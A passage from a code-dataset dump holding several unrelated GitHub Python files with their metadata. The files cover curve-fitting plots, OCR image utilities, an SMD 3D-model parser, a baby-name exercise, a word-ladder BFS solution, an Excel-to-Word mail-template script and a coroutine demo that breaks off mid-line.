axis.text(0.95,0.95, (('tau2=%0.3f (+/- %0.3f) \\n'+\\\n 'tau1=%0.3f (+/- %0.3f) \\n'+\n 'A=%0.3f (+/- %0.3f) \\n'+\\\n 't0=%0.3f (+/- %0.3f)') % \\\n (self.coeff[0] , self.perr[0],\n self.coeff[1] , self.perr[1],\n self.coeff[2] , self.perr[2],\n self.coeff[3] , self.perr[3]\n )\n ),\n fontsize=8,\n verticalalignment='top',\n horizontalalignment='right',\n transform=axis.transAxes)\n\nclass Ddouble_exp_fit(fitting_nohist):\n\n def Ddouble_exp(x, *param):\n alfa1 = 
1.0/param[1]\n        beta1 = 1.0/param[0]\n        t_p1 = np.log(beta1/alfa1)/(beta1-alfa1)\n        K1 = (beta1)*np.exp(alfa1*t_p1)/(beta1-alfa1)\n        f1 = param[2]*K1*(np.exp(-(x-param[3])*alfa1)-np.exp(-(x-param[3])*beta1))\n        f1[f1<0] = 0\n\n        alfa2 = 1.0/param[5]\n        beta2 = 1.0/param[4]\n        t_p2 = np.log(beta2/alfa2)/(beta2-alfa2)\n        K2 = (beta2)*np.exp(alfa2*t_p2)/(beta2-alfa2)\n        f2 = param[6]*K2*(np.exp(-(x-param[7])*alfa2)-np.exp(-(x-param[7])*beta2))\n        f2[f2<0] = 0\n\n        return f1+f2\n\n    def __call__(self, data, time, guess):\n        # First guess; the parent __call__ requires method and bounds ('lm' ignores bounds)\n        super(Ddouble_exp_fit,self).__call__(data=data,\n                                             time=time,\n                                             fit_func=self.Ddouble_exp,\n                                             guess=guess,\n                                             method='lm',\n                                             bounds=None)\n\n    def plot(self,axis,title,xlabel,ylabel,res=True,fit=True):\n        #axis.hist(self.data, self.bins, align='mid', facecolor='green', edgecolor='white', linewidth=0.5)\n        axis.set_xlabel(xlabel)\n        axis.set_ylabel(ylabel)\n        axis.set_title(title)\n        if (fit==True):\n            axis.plot(self.bins, self.fit, 'r--', linewidth=1)\n        axis.text(0.95,0.95, (('tau2_a=%0.3f (+/- %0.3f) \\n'+\n                               'tau1_a=%0.3f (+/- %0.3f) \\n'+\n                               'A_a=%0.3f (+/- %0.3f) \\n'+\n                               't0_a=%0.3f (+/- %0.3f) \\n'+\n                               'tau2_b=%0.3f (+/- %0.3f) \\n'+\n                               'tau1_b=%0.3f (+/- %0.3f) \\n'+\n                               'A_b=%0.3f (+/- %0.3f) \\n'+\n                               't0_b=%0.3f (+/- %0.3f)') % \\\n                              (self.coeff[0] , self.perr[0],\n                               self.coeff[1] , self.perr[1],\n                               self.coeff[2] , self.perr[2],\n                               self.coeff[3] , self.perr[3],\n                               self.coeff[4] , self.perr[4],\n                               self.coeff[5] , self.perr[5],\n                               self.coeff[6] , self.perr[6],\n                               self.coeff[7] , self.perr[7]\n                               )\n                              ),\n                  fontsize=8,\n                  verticalalignment='top',\n                  horizontalalignment='right',\n                  transform=axis.transAxes)\n\nclass GND_fit(fitting):\n\n    @staticmethod\n    def GND(x, *param):\n        # Generalized normal distribution\n        # param[0]=ALFA | param[1]=BETA | param[2]=GAMMA | param[3]=MU\n        return (param[1]/(2*param[0]*param[2]*(1/param[1]))) * \\\n               np.exp(-(np.abs(x-param[3])/param[0])**param[1])\n\n    def __call__(self, data, bins):\n        self.p0 = [np.std(data), 1, 1, np.mean(data)]\n        # First guess\n        if len(bins)>1:\n            super(GND_fit,self).__call__(data=data,\n                                         bins=bins,\n                                         guess=self.p0,\n                                         fit_func=self.GND)\n\n    def plot(self,axis,title,xlabel,ylabel,res=True,fit=True):\n        axis.hist(self.data, self.bins, align='mid', facecolor='green')\n        axis.set_xlabel(xlabel)\n        axis.set_ylabel(ylabel)\n        axis.set_title(title)\n        if (fit==True):\n            axis.plot(self.bin_centers, self.hist_fit, 'r--', linewidth=1)\n            if (res==True):\n                mu = self.coeff[3]; mu_err = self.perr[3]\n                sigma = self.coeff[0]*np.sqrt(3) ; sigma_err = np.sqrt(3)*self.perr[0]\n\n                # Wikipedia\n                # NOTE:Try to include CHI_SQUARE\n                half_p_dx = self.bin_centers[np.abs(self.hist_fit.astype('float') - np.max(self.hist_fit).astype('float')/2).argmin()] \\\n                            - self.bin_centers[np.abs(self.hist_fit.astype('float') - np.max(self.hist_fit).astype('float')).argmin()]\n                FWHM = 2*half_p_dx\n\n                axis.text(0.95,0.95, (('$\\mu$=%0.2f (+/- %0.2f) \\n'+\\\n                                       '$\\sigma$=%0.2f (+/- %0.2f) \\n' +\\\n                                       'FWHM=%0.2f (+/- %0.2f)') %\n                                      (mu , mu_err,\n                                       np.absolute(sigma) , sigma_err,\n                                       FWHM, 2.35*sigma_err\n                                       )\n                                      ),\n                          fontsize=8,\n                          verticalalignment='top',\n                          horizontalalignment='right',\n                          transform=axis.transAxes)\n\nclass gauss_fit(fitting):\n\n    @staticmethod\n    def gauss(x, *param):\n        return param[0] * np.exp(-(x-param[1])**2/(2.*param[2]**2))\n\n    def __call__(self, data, bins):\n\n        self.p0 = [1, np.mean(data), np.std(data)]\n        # First guess\n        xi2_vec=[]\n        if isinstance(bins,list):\n            bin_range = np.arange(bins[0],bins[1]+1)\n            for i in bin_range:\n                super(gauss_fit,self).__call__(data=data,\n                                               bins=i,\n                                               guess=self.p0,\n                                               fit_func=self.gauss)\n                
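# keep this binning's chi-square so the bin count with the smallest value can be refit below\n                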
xi2_vec.append(self.xi2)\n            argmin_xi2 = np.argmin(xi2_vec)\n\n            super(gauss_fit,self).__call__(data=data,\n                                           bins=bin_range[argmin_xi2],\n                                           guess=self.p0,\n                                           fit_func=self.gauss)\n        else:\n            super(gauss_fit,self).__call__(data=data,\n                                           bins=bins,\n                                           guess=self.p0,\n                                           fit_func=self.gauss)\n\n    def plot(self,axis,title,xlabel,ylabel,res=True,fit=True):\n        axis.hist(self.data, self.bins, align='mid', facecolor='green', edgecolor='white', linewidth=0.5)\n        axis.set_xlabel(xlabel)\n        axis.set_ylabel(ylabel)\n        axis.set_title(title)\n        if (fit==True):\n            axis.plot(self.bin_centers, self.hist_fit, 'r--', linewidth=1)\n            if (res==True):\n                axis.text(0.95,0.95, (('$\\mu$=%0.3f (+/- %0.3f) \\n'+\\\n                                       '$\\sigma$=%0.3f (+/- %0.3f) \\n'+\n                                       'FWHM=%0.3f (+/- %0.3f) \\n'+\\\n                                       'Res=%0.3f%% (+/- %0.3f) \\n'+\\\n                                       'chi2=%0.3f \\n'+'chi2inv_95=%0.3f \\n'+\\\n                                       'p=%0.3f') % \\\n                                      (self.coeff[1] , self.perr[1],\n                                       np.absolute(self.coeff[2]) , self.perr[2],\n                                       2.35*np.absolute(self.coeff[2]),\n                                       2.35*np.absolute(self.perr[2]),\n                                       2.35*np.absolute(self.coeff[2])*100/self.coeff[1],\n                                       2.35*np.absolute(self.coeff[2])*100/self.coeff[1]*\n                                       np.sqrt((self.perr[2]/self.coeff[2])**2+\n                                               (self.perr[1]/self.coeff[1])**2),\n                                       self.xi2,\n                                       chi2.ppf(0.95,len(self.bin_centers)-2-1),\n                                       self.p\n                                       )\n                                      ),\n                          fontsize=8,\n                          verticalalignment='top',\n                          horizontalalignment='right',\n                          transform=axis.transAxes)\n\n\n            else:\n                # No resolution calculation\n                axis.text(0.95,0.95, (('$\\mu$=%0.3f (+/- %0.3f) \\n'+\\\n                                       '$\\sigma$=%0.3f (+/- %0.3f) \\n'+\n                                       'FWHM=%0.3f (+/- %0.3f) \\n'+\\\n                                       'chi2=%0.3f \\n'+'chi2inv_95=%0.3f \\n'+\\\n                                       'p=%0.3f') % \\\n                                      (self.coeff[1], self.perr[1],\n                                       np.absolute(self.coeff[2]), self.perr[2],\n                                       2.35*np.absolute(self.coeff[2]),\n                                       2.35*np.absolute(self.perr[2]),\n                                       self.xi2,\n                                       chi2.ppf(0.95,len(self.bin_centers)-2-1),\n                                       self.p)),\n                          fontsize=8,\n                          verticalalignment='top',\n                          horizontalalignment='right',\n                          transform=axis.transAxes)\n\nclass gauss_fit2(fitting):\n\n    @staticmethod\n    def gauss2(x, *param):\n        return param[0] * np.exp(-(x-param[1])**2/(2.*param[2]**2)) + \\\n               param[3] * np.exp(-(x-param[4])**2/(2.*param[5]**2))\n\n    def __call__(self, data, mu_guess, bins):\n        self.p0 = [100, mu_guess[0], mu_guess[2], 100, mu_guess[1], mu_guess[3]]\n        # First guess\n        super(gauss_fit2,self).__call__(data=data,\n                                        bins=bins,\n                                        guess=self.p0,\n                                        fit_func=self.gauss2)\n\n    def plot(self,axis,title,xlabel,ylabel,res=True):\n        axis.hist(self.data, self.bins, facecolor='green')\n        axis.plot(self.bin_centers, self.hist_fit, 'r--', linewidth=1)\n        axis.set_xlabel(xlabel)\n        axis.set_ylabel(ylabel)\n        axis.set_title(title)\n        if (res==True):\n            axis.text(0.05,0.8, (('$\\mu1$=%0.1f (+/- %0.1f) \\n'+\\\n                                  '$\\sigma1$=%0.1f (+/- %0.1f) \\n'+\n                                  'FWHM1=%0.1f (+/- %0.1f) \\n'+\\\n                                  'Res1=%0.1f%% (+/- %0.1f)') % \\\n                                 (self.coeff[1] , self.perr[1],\n                                  np.absolute(self.coeff[2]) , self.perr[2],\n                                  2.35*np.absolute(self.coeff[2]),\n                                  2.35*np.absolute(self.perr[2]),\n                                  2.35*np.absolute(self.coeff[2])*100/self.coeff[1],\n                                  2.35*np.absolute(self.coeff[2])*100/self.coeff[1]*\n                                  np.sqrt((self.perr[2]/self.coeff[2])**2+\n                                          (self.perr[1]/self.coeff[1])**2)\n                                  )\n                                 ),\n                      fontsize=6,\n                      verticalalignment='top',\n                      horizontalalignment='left',\n                      transform=axis.transAxes)\n\n            axis.text(0.05,1.0, (('$\\mu2$=%0.1f (+/- %0.1f) \\n'+\\\n                                  '$\\sigma2$=%0.1f (+/- %0.1f) \\n'+\n                                  'FWHM2=%0.1f (+/- %0.1f) \\n'+\\\n                                  'Res2=%0.1f%% (+/- %0.1f)') % \\\n                                 (self.coeff[4] , self.perr[4],\n                                  np.absolute(self.coeff[5]) , self.perr[5],\n                                  2.35*np.absolute(self.coeff[5]),\n                                  2.35*np.absolute(self.perr[5]),\n                                  
2.35*np.absolute(self.coeff[5])*100/self.coeff[4],\n                                  2.35*np.absolute(self.coeff[5])*100/self.coeff[4]*\n                                  np.sqrt((self.perr[5]/self.coeff[5])**2+\n                                          (self.perr[4]/self.coeff[4])**2)\n                                  )\n                                 ),\n                      fontsize=6,\n                      verticalalignment='top',\n                      horizontalalignment='left',\n                      transform=axis.transAxes)\n\n        else:\n            pass\n\n\ndef line_fit(f,X,f_sigma,x_text,y_text,title_text,n_figure,graph_sw):\n\n# Makes a linear fit for n points (X input vector).\n# f is the mean of the measured data points\n# f_sigma is the standard deviation (ddof=1) of the measured data points\n# The rest are attributes for the plotting windows (graph_sw = 1 to plot)\n# returns coeff (A,B), perr - error for the fit param,\n# XI2_r --> Squared CHI reduced (Goodness of fit)\n\n    def line(x, A, B):\n        return A*x + B\n\n    p0 = [1,(f[1]-f[0])/(X[1]-X[0])]\n    # 'line' is a local helper function here, not a method\n    coeff, var_matrix = curve_fit(line, X, f,p0=p0)\n\n    #Parameters error estimation (sigma). See numpy user guide\n    perr = np.sqrt(np.diag(var_matrix))\n\n    Y_fit = line(X,coeff[0],coeff[1])\n\n    XI2 = np.sum(((Y_fit-f)**2.)/(f_sigma**2.))\n    XI2_r = XI2/(len(X)-2)\n\n    max_err = np.max(np.abs((Y_fit-f)/Y_fit))*100.0\n\n    print ('Max Linearity Error = %0.3f%%' % max_err)\n\n    if (graph_sw==1):\n        # Draws figure with all the properties\n\n        plt.figure(n_figure)\n        plt.plot(X, Y_fit, 'r--', linewidth=1)\n        plt.errorbar(X, f, fmt='b*', yerr=f_sigma)\n        plt.xlabel(x_text)\n        plt.ylabel(y_text)\n        plt.title(title_text)\n        plt.figtext(0.2,0.75, ('CHI2_r = %0.3f ' % (XI2_r)))\n        plt.show(block=False)\n        #Fit parameters\n        print ('Fitted A = ', coeff[0], '( Error_std=', perr[0],')')\n        print ('Fitted B = ', coeff[1], '( Error_std=', perr[1],')')\n\n    return coeff, perr, XI2_r\n","repo_name":"ralfgad/alimentos","sub_path":"fit_library.py","file_name":"fit_library.py","file_ext":"py","file_size_in_byte":23292,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"44204683807","text":"#-*- coding: utf-8 -*-\n\"\"\"\n@author:MD.Nazmuddoha Ansary,Mobassir Hossain\n\"\"\"\nfrom __future__ import print_function\n\n#---------------------------------------------------------------\n# imports\n#---------------------------------------------------------------\nfrom termcolor import colored\nimport os \nimport cv2 \nimport numpy as np\nfrom PIL import Image, ImageEnhance\nimport gdown\n#---------------------------------------------------------------\ndef LOG_INFO(msg,mcolor='blue'):\n    '''\n    prints a msg/ logs an update\n    args:\n        msg    =   message to print\n        mcolor =   color of the msg \n    '''\n    print(colored(\"#LOG     :\",'green')+colored(msg,mcolor))\n#---------------------------------------------------------------\ndef create_dir(base,ext):\n    '''\n    creates a directory extending base\n    args:\n        base    =   base path \n        ext     =   the folder to create\n    '''\n    _path=os.path.join(base,ext)\n    if not os.path.exists(_path):\n        os.mkdir(_path)\n    return _path\n\ndef download(id,save_dir):\n    gdown.download(id=id,output=save_dir,quiet=False)\n\n#------------------------------------\n# region-utils \n#-------------------------------------\ndef intersection(boxA, boxB):\n    # boxA=ref\n    # boxB=sig\n    # determine the (x, y)-coordinates of the intersection rectangle\n    xA = max(boxA[0], boxB[0])\n    yA = max(boxA[1], boxB[1])\n    xB = min(boxA[2], boxB[2])\n    yB = min(boxA[3], boxB[3])\n    # compute the area of intersection rectangle\n    interArea = abs(max((xB - xA, 0)) * max((yB - yA), 0))\n    x_min,y_min,x_max,y_max=boxB\n    selfArea  = abs((y_max-y_min)*(x_max-x_min))\n    return 
interArea/selfArea\n#---------------------------------------------------------------\ndef localize_box(box,region_boxes):\n '''\n lambda localization\n '''\n max_ival=0\n box_id=-1\n for idx,region_box in enumerate(region_boxes):\n ival=intersection(region_box,box)\n if ival==1:\n return idx\n if ival>max_ival:\n max_ival=ival\n box_id=idx\n if max_ival==0:\n return -1\n return box_id\n#------------------------------------\n# image-utils \n#-------------------------------------\n#---------------------------------------------------------------\ndef remove_shadows(img):\n rgb_planes = cv2.split(img)\n result_norm_planes = []\n for plane in rgb_planes:\n dilated_img = cv2.dilate(plane, np.ones((7,7), np.uint8))\n bg_img = cv2.medianBlur(dilated_img, 21)\n diff_img = 255 - cv2.absdiff(plane, bg_img)\n norm_img = cv2.normalize(diff_img,None, alpha=0, beta=255, norm_type=cv2.NORM_MINMAX, dtype=cv2.CV_8UC1)\n result_norm_planes.append(norm_img)\n\n result_norm = cv2.merge(result_norm_planes)\n return result_norm\n\ndef read_img(image):\n img=cv2.imread(image)\n img=cv2.cvtColor(img,cv2.COLOR_BGR2RGB)\n return img\n\n#---------------------------------------------------------------\n# recognition utils\n#---------------------------------------------------------------\ndef padData(img,pad_loc,pad_dim,pad_type,pad_val):\n '''\n pads an image with white value\n args:\n img : the image to pad\n pad_loc : (lr/tb) lr: left-right pad , tb=top_bottom pad\n pad_dim : the dimension to pad upto\n pad_type: central or left aligned pad\n pad_val : the value to pad \n '''\n \n if pad_loc==\"lr\":\n # shape\n h,w,d=img.shape\n if pad_type==\"central\":\n # pad widths\n left_pad_width =(pad_dim-w)//2\n # print(left_pad_width)\n right_pad_width=pad_dim-w-left_pad_width\n # pads\n left_pad =np.ones((h,left_pad_width,3))*pad_val\n right_pad=np.ones((h,right_pad_width,3))*pad_val\n # pad\n img =np.concatenate([left_pad,img,right_pad],axis=1)\n else:\n # pad widths\n pad_width =pad_dim-w\n # pads\n pad =np.ones((h,pad_width,3))*pad_val\n # pad\n img =np.concatenate([img,pad],axis=1)\n else:\n # shape\n h,w,d=img.shape\n # pad heights\n if h>= pad_dim:\n return img \n else:\n pad_height =pad_dim-h\n # pads\n pad =np.ones((pad_height,w,3))*pad_val\n # pad\n img =np.concatenate([img,pad],axis=0)\n return img.astype(\"uint8\") \n#---------------------------------------------------------------\ndef padWords(img,dim,ptype=\"central\",pvalue=255):\n '''\n corrects an image padding \n args:\n img : numpy array of single channel image\n dim : tuple of desired img_height,img_width\n ptype : type of padding (central,left)\n pvalue : the value to pad\n returns:\n correctly padded image\n\n '''\n img_height,img_width=dim\n mask=0\n # check for pad\n h,w,d=img.shape\n w_new=int(img_height* w/h) \n img=cv2.resize(img,(w_new,img_height),fx=0,fy=0, interpolation = cv2.INTER_NEAREST)\n h,w,d=img.shape\n if w > img_width:\n # for larger width\n h_new= int(img_width* h/w) \n img=cv2.resize(img,(img_width,h_new),fx=0,fy=0, interpolation = cv2.INTER_NEAREST)\n # pad\n img=padData(img,\n pad_loc=\"tb\",\n pad_dim=img_height,\n pad_type=ptype,\n pad_val=pvalue)\n mask=img_width\n\n elif w < img_width:\n # pad\n img=padData(img,\n pad_loc=\"lr\",\n pad_dim=img_width,\n pad_type=ptype,\n pad_val=pvalue)\n if mask>img_width:\n mask=img_width\n \n # error avoid\n img=cv2.resize(img,(img_width,img_height),fx=0,fy=0, interpolation = cv2.INTER_NEAREST)\n return img,mask \n#---------------------------------------------------------------\n# viz 
utils\n#---------------------------------------------------------------\ndef draw_boxes_from_text_dict(image,text_dict):\n for crop_dict in text_dict:\n ln=crop_dict[\"line_no\"]\n wn=crop_dict[\"word_no\"]\n box=crop_dict[\"poly\"]\n box = np.reshape(np.array(box), [-1,1,2]).astype(np.int64)\n image = cv2.polylines(image, [box], True,(255,0,0),2)\n x,y=box[0][0]\n image = cv2.putText(image,f\"{ln}-{wn}\",(x,y), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0,0,255), 1, cv2.LINE_AA)\n return image\n\ndef draw_boxes(image,boxes):\n for idx,box in enumerate(boxes):\n box = np.reshape(np.array(box), [-1,1,2]).astype(np.int64)\n x,y=box[0][0]\n image = cv2.polylines(image, [box], True,(255,0,0),2)\n image = cv2.putText(image,str(idx),(x,y), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0,0,255), 1, cv2.LINE_AA)\n return image\n\n \n","repo_name":"mobassir94/Multilingual-Reader","sub_path":"coreLib/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":6897,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"94"} +{"seq_id":"15152027452","text":"import numpy as np\n\ndef replacemat(triangle_list, orig, repl):\n for tri in triangle_list:\n if tri.matName == orig:\n tri.matName = repl\n\ndef buildVert(dataline: str):\n tokens = dataline.split()\n return VertexData(int(tokens[0]),\n np.array([float(tokens[1]), float(tokens[2]), float(tokens[3])]),\n np.array([float(tokens[4]), float(tokens[5]), float(tokens[6])]),\n np.array([float(tokens[7]), float(tokens[8])]))\n\ndef buildTriangle(data: list):\n return TriangleData([buildVert(data[1]), buildVert(data[2]), buildVert(data[3])],\n data[0].strip('\\n'))\n\nclass VertexData:\n def __init__(self, nodeID, pos: np.array, norm: np.array, texCoord: np.array):\n self.boneID = nodeID\n self.pos = pos\n self.norm = norm\n self.texCoord = texCoord\n\n def smdString(self):\n def fstr(d):\n return '{:.9f}'.format(d)\n return (str(self.boneID)+' '+fstr(self.pos[0])+' '+fstr(self.pos[1])+' '+fstr(self.pos[2])+' '\n + fstr(self.norm[0]) + ' '+fstr(self.norm[1])+' '+fstr(self.norm[2])+' '\n + fstr(self.texCoord[0]) + ' '+fstr(self.texCoord[1]))\n\n def translate(self, vec:np.array):\n return VertexData(self.boneID, self.pos+vec, self.norm, self.texCoord)\n\n def apply_transformation(self, rot_mat, translation):\n return VertexData(self.boneID, np.dot(self.pos, rot_mat) + translation, np.dot(self.norm, rot_mat), self.texCoord)\n\n\nclass TriangleData:\n def __init__(self, vertList: list, matName: str = 'undefined'):\n self.matName = matName\n self.verts = vertList\n\n def translate(self, vec: np.array):\n for vert in self.verts:\n vert.pos += vec\n\n def __add__(self, vec: np.array):\n return TriangleData([c.translate(vec) for c in self.verts], self.matName)\n\n def smdString(self):\n r_str = self.matName\n for x in self.verts:\n r_str += '\\n'+x.smdString()\n return r_str\n\n def apply_transformation(self, rot_mat, translation):\n return TriangleData([c.apply_transformation(rot_mat, translation) for c in self.verts], self.matName)\n\nclass TimeFrame:\n def __init__(self, data: list):\n self.index = int(data[0].split()[1])\n self.datastr = data[1].strip('\\n')\n\n def smdString(self):\n return 'time '+str(self.index)+'\\n'+self.datastr\n\n\nclass SMD:\n def __init__(self, filename: str = None):\n self.nodes = list()\n self.sequence = list()\n self.triangles = list()\n if filename is not None:\n file = open(filename, 'r')\n f_data = file.readlines()\n index = 0\n\n def seek(regex:str, index):\n while regex not in f_data[index]:\n index += 
1\n return index\n\n index = seek(\"nodes\", index)\n index += 1\n while \"end\" not in f_data[index]:\n self.nodes.append(f_data[index].strip('\\n'))\n index += 1\n\n \"\"\"index = seek(\"skeleton\", index)\n index += 1\n while \"end\" not in f_data[index]:\n self.sequence.append(TimeFrame(f_data[index:index+2]))\n index += 2\"\"\"\n\n index = seek(\"triangles\", index)\n index += 1\n while \"end\" not in f_data[index]:\n self.triangles.append(buildTriangle(f_data[index:index+4]))\n index += 4\n self.matset = set()\n for tri in self.triangles:\n self.matset.add(tri.matName)\n\n def replace_mat(self, orig, repl):\n replacemat(self.triangles, orig, repl)\n\n def getsmdstring(self):\n r_str = ('//SMD Generated by Tile Script'\n '\\n//Author: SMD Generator'\n '\\nversion 1.0')\n r_str += '\\nnodes'\n for x in self.nodes:\n r_str += '\\n'+ x\n r_str += '\\nend'\n r_str += '\\nskeleton'\n for x in self.sequence:\n r_str += '\\n'+x.smdString()\n r_str += '\\nend'\n r_str += '\\ntriangles'\n for x in self.triangles:\n r_str += '\\n'+x.smdString()\n r_str += '\\nend'\n return r_str\n\n def write_to_file(self, filepath):\n r_str = self.getsmdstring()\n f = open(filepath+'.smd', 'w')\n f.write(r_str)\n f.close()\n\n#d = SMD('facade2_mesh.smd')\n#d.write_to_file('newmd')\n#print(len(d.triangles))\n#print(\"T\")\n\n","repo_name":"ZackFiner/SourceSDK-Batch-Model-Compiler","sub_path":"src/SMD.py","file_name":"SMD.py","file_ext":"py","file_size_in_byte":4480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"24437221367","text":"\"\"\"\nFile: Milestone1.py\nName: \n-----------------------\nThis file tests the milestone 1 for\nour babyname.py project\n\"\"\"\n\nimport sys\n\n\ndef add_data_for_name(name_data, year, rank, name):\n \"\"\"\n :param name_data: dict, key: name of the new born baby, value(dict):the ranking of the name in particular year\n :param year: str, particular year\n :param rank: str, ranking of the name in that particular year\n :param name: str, the name of the new born baby\n \"\"\"\n if name in name_data: # if name already in the dictionary\n if year in name_data[name] and int(rank) < int(name_data[name][year]): # same name/year in both gender, use the lower rank\n name_data[name][year] = rank\n elif year not in name_data[name]: # adding a new year to the dictionary\n name_data[name][year] = rank\n else:\n name_data[name] = {year: rank} # if it's new name in the dictionary, just add it\n\n\n# ------------- DO NOT EDIT THE CODE BELOW THIS LINE ---------------- #\n\n\ndef test1():\n name_data = {'Kylie': {'2010': '57'}, 'Nick': {'2010': '37'}}\n add_data_for_name(name_data, '2010', '208', 'Kate')\n print('--------------------test1----------------------')\n print(str(name_data))\n print('-----------------------------------------------')\n\n\ndef test2():\n name_data = {'Kylie': {'2010': '57'}, 'Nick': {'2010': '37'}}\n add_data_for_name(name_data, '2000', '104', 'Kylie')\n print('--------------------test2----------------------')\n print(str(name_data))\n print('-----------------------------------------------')\n\n\ndef test3():\n name_data = {'Kylie': {'2010': '57'}, 'Sammy': {'1980': '451', '1990': '200'}, 'Kate': {'2000': '100'}}\n add_data_for_name(name_data, '1990', '900', 'Sammy')\n add_data_for_name(name_data, '2010', '400', 'Kylie')\n add_data_for_name(name_data, '2000', '20', 'Kate')\n print('-------------------test3-----------------------')\n print(str(name_data))\n 
print('-----------------------------------------------')\n\n\ndef test4():\n    name_data = {'Kylie': {'2010': '57'}, 'Nick': {'2010': '37'}}\n    add_data_for_name(name_data, '2010', '208', 'Kate')\n    add_data_for_name(name_data, '2000', '108', 'Kate')\n    add_data_for_name(name_data, '1990', '200', 'Sammy')\n    add_data_for_name(name_data, '1990', '90', 'Sammy')\n    add_data_for_name(name_data, '2000', '104', 'Kylie')\n    print('--------------------test4----------------------')\n    print(str(name_data))\n    print('-----------------------------------------------')\n\n\ndef main():\n    args = sys.argv[1:]\n    if len(args) == 1 and args[0] == 'test1':\n        test1()\n    elif len(args) == 1 and args[0] == 'test2':\n        test2()\n    elif len(args) == 1 and args[0] == 'test3':\n        test3()\n    elif len(args) == 1 and args[0] == 'test4':\n        test4()\n\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"ShuyunLiu/Python_projects","sub_path":"Python_projects/Name Popularity Searching System/milestone1.py","file_name":"milestone1.py","file_ext":"py","file_size_in_byte":2892,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"5932568799","text":"from typing import List\nimport collections\nfrom collections import deque\n\n\nclass Solution:\n    def ladderLength(self, beginWord: str, endWord: str, wordList: List[str]) -> int:\n        \"\"\"\n        1. Create adjacency list pattern:words\n        2. Do BFS\n        \n        \"\"\"\n        \n        nei = collections.defaultdict(list)\n        wordList.append(beginWord)\n        \n        for word in wordList:\n            for i in range(len(word)):\n                pattern = word[:i] + \"*\" + word[i+1:]\n                nei[pattern].append(word)\n        \n        q = deque([beginWord])\n        visited = set([beginWord])\n        \n        res = 1\n        while q:\n            for i in range(len(q)):\n                word = q.popleft()\n                if word == endWord:\n                    return res\n                for j in range(len(word)):\n                    pattern = word[:j] + \"*\" + word[j+1:]\n                    for neighbor in nei[pattern]:\n                        if neighbor not in visited:\n                            visited.add(neighbor)\n                            q.append(neighbor)\n            res +=1\n        return 0","repo_name":"shubhroses/Leetcode","sub_path":"hard_question/127_Word_Ladder.py","file_name":"127_Word_Ladder.py","file_ext":"py","file_size_in_byte":1053,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"1075410780","text":"from openpyxl import load_workbook\r\nimport aspose.words as aw\r\nvalue0 = 0\r\n\r\n\r\n### Main Loop ###\r\n\r\nwhile True:\r\n\r\n    ### Interact with spreadsheet ###\r\n\r\n    cell_row = 3\r\n    chosen_mail_draft = 'mail_draft.docx' #input (\"Podaj nazwę drafta maila: \\n\") + \".docx\"\r\n    chosen_workbook = input (\"Podaj nazwę pliku excel: \\n\") + \".xlsx\"\r\n    chosen_worksheet = input (\"Podaj nazwę arkusza: \\n\")\r\n    limit = int(input(\"Ile maili chcesz otrzymać (licząć od góry): \\n\"))\r\n    run = True\r\n    \r\n    while run:\r\n\r\n        ### get info from cell ### \r\n        \r\n        cn_cell_coordinates = 'A' + str(cell_row)\r\n        workbook = load_workbook(chosen_workbook)\r\n        worksheet = workbook[chosen_worksheet]\r\n        cn_cell = (worksheet[cn_cell_coordinates].value)\r\n\r\n        gender_cell_coordinates = 'B' + str(cell_row)\r\n        gn_cell = (worksheet[gender_cell_coordinates].value) \r\n\r\n        mail_cell_coordinates = 'D' + str(cell_row)\r\n        mail_cell = (worksheet[mail_cell_coordinates].value)\r\n\r\n\r\n        ### set the greeting ###\r\n\r\n\r\n        if gn_cell == 'f':\r\n            greeting_text = \"Szanowna Pani,\"\r\n        elif gn_cell == 'm':\r\n            greeting_text = \"Szanowny Panie,\"\r\n        else:\r\n            greeting_text = 'Szanowni Państwo, ' \r\n\r\n        ### replace words in document and save new document ###\r\n\r\n        doc = aw.Document(chosen_mail_draft)\r\n        \r\n        
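# NOTE: the mail draft must contain the ((company_name)), ((greeting)) and ((company_mail)) placeholders verbatim for these replacements to match\r\n        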
doc.range.replace('((company_name))', cn_cell, aw.replacing.FindReplaceOptions(aw.replacing.FindReplaceDirection.FORWARD))\r\n doc.range.replace('((greeting))', greeting_text, aw.replacing.FindReplaceOptions(aw.replacing.FindReplaceDirection.FORWARD))\r\n doc.range.replace('((company_mail))', mail_cell, aw.replacing.FindReplaceOptions(aw.replacing.FindReplaceDirection.FORWARD))\r\n # print ('mail{}.docx'.format(value0 + 1))\r\n print('SKN B nie ma biura')\r\n doc.save(\"mail do {}.docx\".format(cn_cell))\r\n\r\n value0 += 1\r\n cell_row += 1\r\n\r\n if value0 == limit:\r\n run = False\r\n break\r\n","repo_name":"PiotrT22/Basic-python-programms","sub_path":"auto-mail-filling.py","file_name":"auto-mail-filling.py","file_ext":"py","file_size_in_byte":2044,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"42890696763","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2019/2/15 10:26\n# @Author : Bilon\n# @File : 协程.py\nimport time\n\n\ndef fun():\n i = 0\n while True:\n value = yield i\n if value is not None:\n print('接到任务...')\n time.sleep(1)\n i = value + 1\n print('完成任务...')\n\n\ndef run(cor):\n next(cor)\n for i in range(3):\n num = cor.send(i) # 执行其它子程序\n print('当前数字:', num)\n cor.close()\n\n\ndef odds(max_num): # 定义子生成器\n odd = 1 # 起始奇数\n count = 0 # 获取次数\n while odd <= max_num: # 循环获取到最大奇数值\n value = yield odd # 生成奇数\n odd += 2 # 计算下一个奇数\n count += 1 # 生成次数递增\n if value is None or True: # 获取外部传入的值\n print('第', count, '个奇数生成成功...')\n return count # 返回生成次数\n\n\ndef copy_odds(max_num): # 定义委托生成器\n print('-' * 8, '开始', '-' * 8)\n count = yield from odds(max_num) # 获取生成器部分操作以及返回值\n print('-' * 8, '完成', '-' * 8)\n print('共生成了', count, '个奇数。')\n\n\nif __name__ == '__main__':\n\n # cor = fun()\n # run(cor)\n\n gen = copy_odds(9) # 